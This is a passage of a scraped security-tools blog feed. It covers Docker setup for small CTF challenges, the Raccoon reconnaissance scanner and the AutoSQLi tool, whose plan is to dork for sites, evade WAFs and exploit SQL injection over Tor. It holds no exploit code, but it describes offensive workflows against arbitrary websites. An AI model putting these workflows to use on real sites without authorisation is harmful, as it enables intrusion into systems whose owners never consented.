<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.2.8</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-45590331558963044992018-08-26T10:12:00.000-03:002018-08-26T10:12:01.993-03:00Microctfs - Small CTF Challenges Running On Docker<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-GfoQJOicmzo/W3-Jy9g9mqI/AAAAAAAAMPk/uHFqOiIhUgUC8WnG_jhQwsz86t-A0e49QCLcBGAs/s1600/docker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="370" data-original-width="485" src="https://4.bp.blogspot.com/-GfoQJOicmzo/W3-Jy9g9mqI/AAAAAAAAMPk/uHFqOiIhUgUC8WnG_jhQwsz86t-A0e49QCLcBGAs/s1600/docker.png" /></a></div>
<br />
Small <a href="http://www.kitploit.com/search/label/CTF">CTF</a> challenges running on Docker<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>logviewer</b></span><br />
<br />
<b>Build and Start logviewer challenge exposed on port 8000</b><br />
<pre><code>cd logviewer
docker build -t logviewer .
docker run -d -p 8000:80 --name log_challenge logviewer</code></pre>
<br />
<b>Restart logviewer challenge</b><br />
<pre><code>docker rm -f log_challenge && docker run -d -p 8000:80 --name log_challenge logviewer</code></pre>
<br />
<b>Stop logviewer challenge</b><br />
<pre><code>docker rm -f log_challenge</code></pre>
<br />
<span style="font-size: large;"><b>sqli</b></span><br />
<br />
<b>Build and Start <a href="http://www.kitploit.com/search/label/SQLi">sqli</a> challenge exposed on port 8883</b><br />
<pre><code>cd sqli
docker build -t sqli .
docker run -d -p 8883:80 --name sqli_chal sqli</code></pre>
<br />
<b>Restart sqli challenge</b><br />
<pre><code>docker rm -f sqli_chal && docker run -d -p 8883:80 --name sqli_chal sqli</code></pre>
<br />
<b>Stop sqli challenge</b><br />
<pre><code>docker rm -f sqli_chal</code></pre>
<br />
<span style="font-size: large;"><b>tcmanager</b></span><br />
<br />
<b>Build and Start tcmanager challenge exposed on port 8080</b><br />
<pre><code>cd tcmanager
docker build -t tcmanager .
docker run -d -p 8080:8080 --name tc_chal tcmanager</code></pre>
<br />
<b>Restart tcmanager challenge</b><br />
<pre><code>docker rm -f tc_chal && docker run -d -p 8080:8080 --name tc_chal tcmanager</code></pre>
<br />
<b>Stop tcmanager challenge</b><br />
<pre><code>docker rm -f tc_chal</code></pre>
<br />
<span style="font-size: large;"><b>geddy</b></span><br />
<br />
<b>Build and Start geddy challenge exposed on port 40000</b><br />
<pre><code>cd geddy
docker build -t geddy .
docker run -d -p 40000:4000 --name geddy_chal geddy</code></pre>
<br />
<b>Restart geddy challenge</b><br />
<pre><code>docker rm -f geddy_chal && docker run -d -p 40000:4000 --name geddy_chal geddy</code></pre>
<br />
<b>Stop geddy challenge</b><br />
<pre><code>docker rm -f geddy_chal</code></pre>
<br />
<span style="font-size: large;"><b>printf</b></span><br />
<br />
<b>Build and Start printf challenge exposed on port 1337</b><br />
<pre><code>cd printf
docker build -t printf .
docker run -d -p 1337:1337 --name printfchal printf</code></pre>
<br />
<b>Restart printf challenge</b><br />
<pre><code>docker rm -f printfchal && docker run -d -p 1337:1337 --name printfchal printf</code></pre>
<br />
<b>Stop geddy challenge</b><br />
<pre><code>docker rm -f printfchal</code></pre>
<br />
<span style="font-size: large;"><b>xxe</b></span><br />
<br />
<b>Build and Start <a href="http://www.kitploit.com/search/label/XXE">xxe</a> challenge exposed on port 8080</b><br />
<pre><code>cd xxe
docker build -t xxe .
docker run -d -p 8080:8080 xxe mvn jetty:run</code></pre>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/gabemarshall/microctfs" rel="nofollow" target="_blank">Download Microctfs</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-81541904985923738732018-08-04T17:49:00.000-04:002018-08-04T17:49:12.612-04:00Raccoon - A High Performance Offensive Security Tool For Reconnaissance And Vulnerability Scanning<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-MNlKi5k8uSU/W2E_hECkFkI/AAAAAAAAMBA/9yfiX-UpBdUCvs5x09kTXyzS3QfvzxeUQCLcBGAs/s1600/Raccoon_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="696" data-original-width="566" src="https://4.bp.blogspot.com/-MNlKi5k8uSU/W2E_hECkFkI/AAAAAAAAMBA/9yfiX-UpBdUCvs5x09kTXyzS3QfvzxeUQCLcBGAs/s1600/Raccoon_6.png" /></a></div>
<br />
Offensive Security Tool for <a href="http://www.kitploit.com/search/label/Reconnaissance">Reconnaissance</a> and Information Gathering.<br />
<a name='more'></a><br />
<b>Features</b><br />
<ul class="contains-task-list">
<li class="task-list-item">DNS details</li>
<li class="task-list-item">DNS visual mapping using DNS dumpster</li>
<li class="task-list-item">WHOIS information</li>
<li class="task-list-item">TLS Data - supported ciphers, TLS versions, certificate details and SANs</li>
<li class="task-list-item">Port Scan</li>
<li class="task-list-item">Services and scripts scan</li>
<li class="task-list-item">URL fuzzing and dir/file detection</li>
<li class="task-list-item">Subdomain enumeration - uses Google dorking, DNS dumpster queries, SAN discovery and bruteforce</li>
<li class="task-list-item">Web application data retrieval:<br /> <ul>
<li>CMS detection</li>
<li>Web server info and X-Powered-By</li>
<li>robots.txt and sitemap extraction</li>
<li>Cookie inspection</li>
<li>Extracts all fuzzable URLs</li>
<li>Discovers HTML forms</li>
<li>Retrieves all Email addresses</li>
</ul>
</li>
<li class="task-list-item">Detects known WAFs</li>
<li class="task-list-item">Supports anonymous routing through Tor/Proxies</li>
<li class="task-list-item">Uses asyncio for improved performance</li>
<li class="task-list-item">Saves output to files - separates targets by folders and modules by files</li>
</ul>
<br />
<b>Roadmap and TODOs</b><br />
<ul class="contains-task-list">
<li class="task-list-item">Support multiple hosts (read from file)</li>
<li class="task-list-item">Rate limit evasion</li>
<li class="task-list-item">OWASP <a href="http://www.kitploit.com/search/label/vulnerabilities">vulnerabilities</a> scan (RFI, RCE, XSS, SQLi etc.)</li>
<li class="task-list-item">SearchSploit lookup on results</li>
<li class="task-list-item">IP ranges support</li>
<li class="task-list-item">CIDR notation support</li>
<li class="task-list-item">More output formats</li>
</ul>
<br />
<span style="font-size: large;"><b>About</b></span><br />
Raccoon is a tool made for reconnaissance and <a href="http://www.kitploit.com/search/label/Information%20Gathering">information gathering</a> with an emphasis on simplicity.<br />
It will do everything from fetching DNS records, retrieving WHOIS information, obtaining TLS data, detecting WAF presence and up to threaded dir busting and subdomain enumeration. Every scan outputs to a corresponding file.<br />
As most of Raccoon's scans are independent and do not rely on each other's results, it utilizes Python's asyncio to run most scans asynchronously.<br />
Raccoon supports Tor/proxy for anonymous routing. It uses default wordlists (for URL fuzzing and subdomain discovery) from the amazing <a href="https://github.com/danielmiessler/SecLists" rel="nofollow" target="_blank">SecLists</a> repository but different lists can be passed as arguments.<br />
For more options - see "Usage".<br />
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
For the latest stable version:<br />
<pre><code>pip install raccoon-scanner</code></pre>
Or clone the GitHub repository for the latest features and changes:<br />
<pre><code>git clone https://github.com/evyatarmeged/Raccoon.git
cd Raccoon
python raccoon_src/main.py</code></pre>
<br />
<b>Prerequisites</b><br />
Raccoon uses <a href="https://github.com/nmap/nmap" rel="nofollow" target="_blank">Nmap</a> to scan ports as well as utilizes some other Nmap scripts and features. It is mandatory that you have it installed before running Raccoon.<br />
<a href="https://github.com/openssl/openssl" rel="nofollow" target="_blank">OpenSSL</a> is also used for TLS/SSL scans and should be installed as well.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<pre><code>Usage: raccoon [OPTIONS]
Options:
--version Show the version and exit.
-t, --target TEXT Target to scan [required]
-d, --dns-records TEXT Comma separated DNS records to query.
Defaults to: A,MX,NS,CNAME,SOA,TXT
--tor-routing Route HTTP traffic through Tor (uses port
9050). Slows total runtime significantly
--proxy-list TEXT Path to proxy list file that would be used
for routing HTTP traffic. A proxy from the
list will be chosen at random for each
request. Slows total runtime
--proxy TEXT Proxy address to route HTTP traffic through.
Slows total runtime
-w, --wordlist TEXT Path to wordlist that would be used for URL
fuzzing
-T, --threads INTEGER Number of threads to use for URL
Fuzzing/Subdomain enumeration. Default: 25
--ignored-response-codes TEXT Comma separated list of HTTP status code to
ignore for fuzzing. Defaults to:
302,400,401,402,403,404,503,504
--subdomain-list TEXT Path to subdomain list file that would be
used for enumeration
-S, --scripts Run Nmap scan with -sC flag
-s, --services Run Nmap scan with -sV flag
-f, --full-scan Run Nmap scan with both -sV and -sC
-p, --port TEXT Use this port range for Nmap scan instead of
the default
--tls-port INTEGER Use this port for TLS queries. Default: 443
--skip-health-check Do not test for target host availability
-fr, --follow-redirects Follow redirects when fuzzing. Default: True
--no-url-fuzzing Do not fuzz URLs
--no-sub-enum Do not bruteforce subdomains
-q, --quiet Do not output to stdout
-o, --outdir TEXT Directory destination for scan output
--help Show this message and exit.</code></pre>
<br />
<span style="font-size: large;"><b>Screenshots</b></span><br />
<br />
<strong><a href="https://www.hackthebox.eu/" rel="nofollow" target="_blank">HTB</a> challenge example scan:</strong><br />
<br />
<strong><br /></strong>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-VsbHYFAf_GA/W2E_1hW1bbI/AAAAAAAAMBI/4OQ9k3sI_lYfnBGY3cCRD8cVnUYb8secACLcBGAs/s1600/Raccoon_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="415" data-original-width="726" height="364" src="https://3.bp.blogspot.com/-VsbHYFAf_GA/W2E_1hW1bbI/AAAAAAAAMBI/4OQ9k3sI_lYfnBGY3cCRD8cVnUYb8secACLcBGAs/s640/Raccoon_7.png" width="640" /></a></div>
<br />
<strong>Results folder tree after a scan:</strong><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Uq7MNwxGu6w/W2E_6xw6NvI/AAAAAAAAMBM/YQQAm3LRxMw5tERYA65Czy0KkDYtAvf2wCLcBGAs/s1600/Raccoon_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="277" data-original-width="205" src="https://3.bp.blogspot.com/-Uq7MNwxGu6w/W2E_6xw6NvI/AAAAAAAAMBM/YQQAm3LRxMw5tERYA65Czy0KkDYtAvf2wCLcBGAs/s1600/Raccoon_8.png" /></a></div>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/evyatarmeged/Raccoon" rel="nofollow" target="_blank">Download Raccoon</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-5422486968596307452018-06-07T18:10:00.000-04:002018-06-07T18:10:25.229-04:00AutoSQLi - An Automatic SQL Injection Tool Which Takes Advantage Of Googler, Ddgr, WhatWaf And SQLMap<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-sEKuhlc4xVg/WxBE0Ox1OUI/AAAAAAAALXI/zHwK91zu13szqqo4GwOz0Icojy8bjZFlwCLcBGAs/s1600/AutoSQLi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="345" data-original-width="657" height="336" src="https://3.bp.blogspot.com/-sEKuhlc4xVg/WxBE0Ox1OUI/AAAAAAAALXI/zHwK91zu13szqqo4GwOz0Icojy8bjZFlwCLcBGAs/s640/AutoSQLi.png" width="640" /></a></div>
<br />
An Automatic SQL Injection Tool Which Takes Advantage Of ~DorkNet~ Googler, Ddgr, WhatWaf And Sqlmap.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Features</b></span><br />
<ul>
<li>Save System - there is a complete save system, which can resume even when your pc crashed. - technology is cool</li>
<li>Dorking - from the <a href="http://www.kitploit.com/search/label/Command%20Line">command line</a> ( one dork ): YES - from a file: NO - from an interactive wizard: YES</li>
<li>Waffing - Thanks to <a href="https://github.com/Ekultek" rel="nofollow" target="_blank">Ekultek</a>, <a href="http://www.kitploit.com/search/label/WhatWaf">WhatWaf</a> now has a JSON output function. - So it's mostly finished :) - UPDATE: WhatWaf is completly working with AutoSQLi. Sqlmap is the next big step</li>
<li>Sqlmapping - I'll look if there is some sort of sqlmap API, because I don't wanna use <code>execute</code> this time (: - Sqlmap is cool</li>
<li>REPORTING: YES</li>
<li>Rest API: NOPE</li>
</ul>
<br />
<span style="font-size: large;"><b>TODO:</b></span><br />
<ul class="contains-task-list">
<li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Log handling (logging with different levels, cleanly)</li>
<li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Translate output (option to translate the save, which is in pickle format, to a json/csv save)</li>
<li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Spellcheck (correct wrongly spelled words and conjugational errors. I'm on Neovim right now and there is no auto-spelling check)</li>
</ul>
<br />
<span style="font-size: large;"><b>The Plan</b></span><br />
This plan is a bit outdated, but it will follow this idea<br />
<ol>
<li>AutoSQLi will be a python application which will, automatically, using a dork provided by the user, return a list of websites <a href="http://www.kitploit.com/search/label/Vulnerable">vulnerable</a> to a SQL injection.</li>
<li>To find vulnerable websites, the users firstly provide a dork <a href="https://www.techopedia.com/definition/30938/google-dorking" rel="nofollow" target="_blank">DOrking</a>, which is passed to findDorks.py, which returns a list of URLs corresponding to it.</li>
<li>Then, AutoSQLi will do some very basic checks ( TODO: MAYBE USING SQLMAP AND IT's --smart and --batch function ) to verify if the application is protected by a Waf, or if one of it's parameters is vulnerable.</li>
<li>Sometimes, websites are protected by a Web Application Firewall, or in short, a WAF. To identify and get around of these WAFs, AutoSQLi will use WhatWaf.</li>
<li>Finally, AutoSQLi will exploit the website using sqlmap, and give the choice to do whatever he wants !</li>
</ol>
<br />
<b>Tor</b><br />
Also, AutoSQLi should work using Tor by default. So it should check for tor availiability on startup.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/jesuiscamille/AutoSQLi" rel="nofollow" target="_blank">Download AutoSQLi</a></span></b></div>
Unknownnoreply@blogger.com